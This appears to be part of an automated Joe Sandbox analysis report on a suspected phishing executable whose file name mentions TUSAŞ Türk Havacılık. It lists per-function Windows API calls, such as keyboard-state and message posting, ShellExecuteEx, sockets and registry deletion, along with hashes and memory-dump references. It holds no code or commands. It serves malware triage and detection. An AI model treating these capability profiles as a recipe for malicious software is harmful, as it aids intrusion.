                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 256516436-0
                                                                                                                                    • Opcode ID: 3d2616145fc68bdeb2778a744b535d9a4baa2ab0d66517d9e0bf4bdc8f3dc2be
                                                                                                                                    • Instruction ID: e007fecae62ec2fb96e0204e2cbf577b506ef59c35f14d0cb598dfadd101abb1
                                                                                                                                    • Opcode Fuzzy Hash: 3d2616145fc68bdeb2778a744b535d9a4baa2ab0d66517d9e0bf4bdc8f3dc2be
                                                                                                                                    • Instruction Fuzzy Hash: E931B231900206EBDF10DFA4DD85EAFB7B9FF45300F2440A9F9449B286DB38AA15DB60
                                                                                                                                    APIs
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 010261EB
                                                                                                                                    • GetDC.USER32(00000000), ref: 010261F3
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 010261FE
                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0102620A
                                                                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 01026246
                                                                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 01026257
                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0102902A,?,?,000000FF,00000000,?,000000FF,?), ref: 01026291
                                                                                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 010262B1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3864802216-0
                                                                                                                                    • Opcode ID: 4e238a4e0ffd986b8cf2c2a3b078ddb9e9c9613d8881e5d2d6d94ce8c0c2be60
                                                                                                                                    • Instruction ID: 913de54fd662d060799aff36df20407c4be7d0e0e99b96f8a14122cde41d30dc
                                                                                                                                    • Opcode Fuzzy Hash: 4e238a4e0ffd986b8cf2c2a3b078ddb9e9c9613d8881e5d2d6d94ce8c0c2be60
                                                                                                                                    • Instruction Fuzzy Hash: 59319F721012107FEB218F64CC8AFEB3FA9EF4A7A5F140055FE889A181C67A9841CB60
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memcmp
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2931989736-0
                                                                                                                                    • Opcode ID: 5f7b61526a557e75de2d7dfa7a62d942689ecd08c4074409e1b0e3b09e19c6f5
                                                                                                                                    • Instruction ID: 2d8af95b3ac3ad00020ab47245565ac5b40882939be51705c89a3f8c024391ef
                                                                                                                                    • Opcode Fuzzy Hash: 5f7b61526a557e75de2d7dfa7a62d942689ecd08c4074409e1b0e3b09e19c6f5
                                                                                                                                    • Instruction Fuzzy Hash: AD21CC6160120E77F608B612DE43FFB775DAE96358F044018FF049A617FB58DE25B2A1
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
                                                                                                                                      • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
                                                                                                                                      • Part of subcall function 00FBFC86: _wcscpy.LIBCMT ref: 00FBFCA9
                                                                                                                                    • _wcstok.LIBCMT ref: 0100EC94
                                                                                                                                    • _wcscpy.LIBCMT ref: 0100ED23
                                                                                                                                    • _memset.LIBCMT ref: 0100ED56
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                                    • String ID: X
                                                                                                                                    • API String ID: 774024439-3081909835
                                                                                                                                    • Opcode ID: 3deeb276af1b1b763fa73a84c66fb09feb0e9057a4258bab4a6733be19e94d73
                                                                                                                                    • Instruction ID: e8f905650a33b031ff43b5d198b5198f7472c1a59c292e478a7ded02c0b8f063
                                                                                                                                    • Opcode Fuzzy Hash: 3deeb276af1b1b763fa73a84c66fb09feb0e9057a4258bab4a6733be19e94d73
                                                                                                                                    • Instruction Fuzzy Hash: 23C19DB05083419FD755EF28CC81E6BB7E0EF86310F04492DF9999B2A2DB74E805DB92
                                                                                                                                    APIs
                                                                                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 01016C00
                                                                                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 01016C21
                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 01016C34
                                                                                                                                    • htons.WSOCK32(?,?,?,00000000,?), ref: 01016CEA
                                                                                                                                    • inet_ntoa.WSOCK32(?), ref: 01016CA7
                                                                                                                                      • Part of subcall function 00FFA7E9: _strlen.LIBCMT ref: 00FFA7F3
                                                                                                                                      • Part of subcall function 00FFA7E9: _memmove.LIBCMT ref: 00FFA815
                                                                                                                                    • _strlen.LIBCMT ref: 01016D44
                                                                                                                                    • _memmove.LIBCMT ref: 01016DAD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3619996494-0
                                                                                                                                    • Opcode ID: 7236b3f7cf126339f7ab7454c3317ff0d89accc0d7395204f5e0cad600c42de8
                                                                                                                                    • Instruction ID: 1e252d36f42c8faa1521c0b64e4eef0767b6cb668ebf4ef0517c5ff2e6d339f8
                                                                                                                                    • Opcode Fuzzy Hash: 7236b3f7cf126339f7ab7454c3317ff0d89accc0d7395204f5e0cad600c42de8
                                                                                                                                    • Instruction Fuzzy Hash: EE81D1B1508300ABD710EF28CC82E6FB7E8AF85714F44491CF9969B292DBB9DD45CB52
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b9a56be9b8bc7835868ad5ad0500c022a10c4c25d334b775be9c92be452eb26f
                                                                                                                                    • Instruction ID: 036475ade1cd459a832e0d3324d4cd58488499731c7407b1c2110c0d5a6c5829
                                                                                                                                    • Opcode Fuzzy Hash: b9a56be9b8bc7835868ad5ad0500c022a10c4c25d334b775be9c92be452eb26f
                                                                                                                                    • Instruction Fuzzy Hash: 18719F71904109EFCB14CF98CC44EBEBB75FF8A360F258149F915AA251C734AA51DF60
                                                                                                                                    APIs
                                                                                                                                    • IsWindow.USER32(011F5D60), ref: 0102B3EB
                                                                                                                                    • IsWindowEnabled.USER32(011F5D60), ref: 0102B3F7
                                                                                                                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0102B4DB
                                                                                                                                    • SendMessageW.USER32(011F5D60,000000B0,?,?), ref: 0102B512
                                                                                                                                    • IsDlgButtonChecked.USER32(?,?), ref: 0102B54F
                                                                                                                                    • GetWindowLongW.USER32(011F5D60,000000EC), ref: 0102B571
                                                                                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0102B589
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4072528602-0
                                                                                                                                    • Opcode ID: 8589def97e8e8f46742a53010930c0a9ceb0621b8286fa279f75d11b1683cb4e
                                                                                                                                    • Instruction ID: 0609c386fcf8abcedee6d367954e9659ba1b6070b1420e6a7f1bb316c3217010
                                                                                                                                    • Opcode Fuzzy Hash: 8589def97e8e8f46742a53010930c0a9ceb0621b8286fa279f75d11b1683cb4e
                                                                                                                                    • Instruction Fuzzy Hash: 37718F34604225AFEB759F68C8D4FBA7BF9FF09340F148099EAC597261CB36A940DB50
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 0101F448
                                                                                                                                    • _memset.LIBCMT ref: 0101F511
                                                                                                                                    • ShellExecuteExW.SHELL32(?), ref: 0101F556
                                                                                                                                      • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
                                                                                                                                      • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
                                                                                                                                      • Part of subcall function 00FBFC86: _wcscpy.LIBCMT ref: 00FBFCA9
                                                                                                                                    • GetProcessId.KERNEL32(00000000), ref: 0101F5CD
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0101F5FC
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                                                                    • String ID: @
                                                                                                                                    • API String ID: 3522835683-2766056989
                                                                                                                                    • Opcode ID: ba03f1e5bf74a48bb0ff4c5002581711b5367228b0f7a68d69ad338087ce1185
                                                                                                                                    • Instruction ID: beeb22add71846dd561545a583d3c3dfec17139c650440817fa050b6c383dc16
                                                                                                                                    • Opcode Fuzzy Hash: ba03f1e5bf74a48bb0ff4c5002581711b5367228b0f7a68d69ad338087ce1185
                                                                                                                                    • Instruction Fuzzy Hash: CF61C0B1A0061ADFCB14DF68C8819AEBBF5FF49310F148069E856AB351CB78AD45DF90
                                                                                                                                    APIs
                                                                                                                                    • GetParent.USER32(?), ref: 01000F8C
                                                                                                                                    • GetKeyboardState.USER32(?), ref: 01000FA1
                                                                                                                                    • SetKeyboardState.USER32(?), ref: 01001002
                                                                                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 01001030
                                                                                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 0100104F
                                                                                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 01001095
                                                                                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 010010B8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 87235514-0
                                                                                                                                    • Opcode ID: f7c72fa2142d1814ba6c5bd6ca6da58a6d7fa231a7454290cee26cbfe92566bc
                                                                                                                                    • Instruction ID: 8d528ebbc8696f1ade33b70bc75142b4e68785861a8174881bece13b37317f32
                                                                                                                                    • Opcode Fuzzy Hash: f7c72fa2142d1814ba6c5bd6ca6da58a6d7fa231a7454290cee26cbfe92566bc
                                                                                                                                    • Instruction Fuzzy Hash: C451C3B06086D639FB3786388845BBABEE95B06344F0885CDF2D4468C3C2E9E8D8D751
                                                                                                                                    APIs
                                                                                                                                    • GetParent.USER32(00000000), ref: 01000DA5
                                                                                                                                    • GetKeyboardState.USER32(?), ref: 01000DBA
                                                                                                                                    • SetKeyboardState.USER32(?), ref: 01000E1B
                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 01000E47
                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 01000E64
                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 01000EA8
                                                                                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 01000EC9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 87235514-0
                                                                                                                                    • Opcode ID: e1aec8469f27df977367b8bbca7cbd10fe1428a898561eb613ad6901ecdb3a4a
                                                                                                                                    • Instruction ID: e4834daffa0b993d6a236c0d363b90b027ad4cb369b5f25c8c8ce0107163880c
                                                                                                                                    • Opcode Fuzzy Hash: e1aec8469f27df977367b8bbca7cbd10fe1428a898561eb613ad6901ecdb3a4a
                                                                                                                                    • Instruction Fuzzy Hash: 2451F6A05087D63DFB3386388C45BBA7EE95B06380F0884CDF2D5568C6C395E898E760
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcsncpy$LocalTime
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2945705084-0
                                                                                                                                    • Opcode ID: 6ed4c51d9ae0466b7589a3c108e0e8263567a11c3af033d153d3a3c120c6c46a
                                                                                                                                    • Instruction ID: 91977aee791a2e7c879593fb8ea430bbc4009b1ffd8f86a93264e39ac75395f1
                                                                                                                                    • Opcode Fuzzy Hash: 6ed4c51d9ae0466b7589a3c108e0e8263567a11c3af033d153d3a3c120c6c46a
                                                                                                                                    • Instruction Fuzzy Hash: 6A41E765C5020976DB11EBB48C47ECFB7B8AF04350F40885AE649E3161EB38A745D7A6
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0100466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,01003697,?), ref: 0100468B
                                                                                                                                      • Part of subcall function 0100466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,01003697,?), ref: 010046A4
                                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 010036B7
                                                                                                                                    • _wcscmp.LIBCMT ref: 010036D3
                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 010036EB
                                                                                                                                    • _wcscat.LIBCMT ref: 01003733
                                                                                                                                    • SHFileOperationW.SHELL32(?), ref: 0100379F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                                                                    • String ID: \*.*
                                                                                                                                    • API String ID: 1377345388-1173974218
                                                                                                                                    • Opcode ID: bba8fcac64c4c6c57f402a4f4389ccac3eeba5418412ad7c5c0ee18d30b9234e
                                                                                                                                    • Instruction ID: 76ee8ee813b8757e906c3c87652b27bd48d18dd021c60cc8e887d8821d5e95f3
                                                                                                                                    • Opcode Fuzzy Hash: bba8fcac64c4c6c57f402a4f4389ccac3eeba5418412ad7c5c0ee18d30b9234e
                                                                                                                                    • Instruction Fuzzy Hash: D5418171508345AEE763EF64D841ADF77E8BF89280F00486EF5C9C7291EA34D289C756
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 010272AA
                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01027351
                                                                                                                                    • IsMenu.USER32(?), ref: 01027369
                                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 010273B1
                                                                                                                                    • DrawMenuBar.USER32 ref: 010273C4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 3866635326-4108050209
                                                                                                                                    • Opcode ID: 7245e04596cfb0afbc72bcc73e35fb371b9f8bea107546bd3c62dc256709a60e
                                                                                                                                    • Instruction ID: 92bbbfb3f10fb5ee84cae0c7c95f1bb8f9b51bd00b89700fd07be54b563e0806
                                                                                                                                    • Opcode Fuzzy Hash: 7245e04596cfb0afbc72bcc73e35fb371b9f8bea107546bd3c62dc256709a60e
                                                                                                                                    • Instruction Fuzzy Hash: 94415975A00219EFDB20DF54D885E9ABBF8FF18350F14846AFE85A7250D735A950CF90
                                                                                                                                    APIs
                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 01020FD4
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 01020FFE
                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 010210B5
                                                                                                                                      • Part of subcall function 01020FA5: RegCloseKey.ADVAPI32(?), ref: 0102101B
                                                                                                                                      • Part of subcall function 01020FA5: FreeLibrary.KERNEL32(?), ref: 0102106D
                                                                                                                                      • Part of subcall function 01020FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 01021090
                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 01021058
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 395352322-0
                                                                                                                                    • Opcode ID: 266be0fa80e03cf6a510419b680e89c58e060a321a59e5d3a136ed9d2a094cb2
                                                                                                                                    • Instruction ID: 2823c93cc58bc2b9ac2b89299de36bd8496ca53a1a4be617295831917afd6201
                                                                                                                                    • Opcode Fuzzy Hash: 266be0fa80e03cf6a510419b680e89c58e060a321a59e5d3a136ed9d2a094cb2
                                                                                                                                    • Instruction Fuzzy Hash: F7310F71A01119BFEB659F94D8C9EFFBBBCEF08340F1001A9F645A2140DA795A459BA0
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 010262EC
                                                                                                                                    • GetWindowLongW.USER32(011F5D60,000000F0), ref: 0102631F
                                                                                                                                    • GetWindowLongW.USER32(011F5D60,000000F0), ref: 01026354
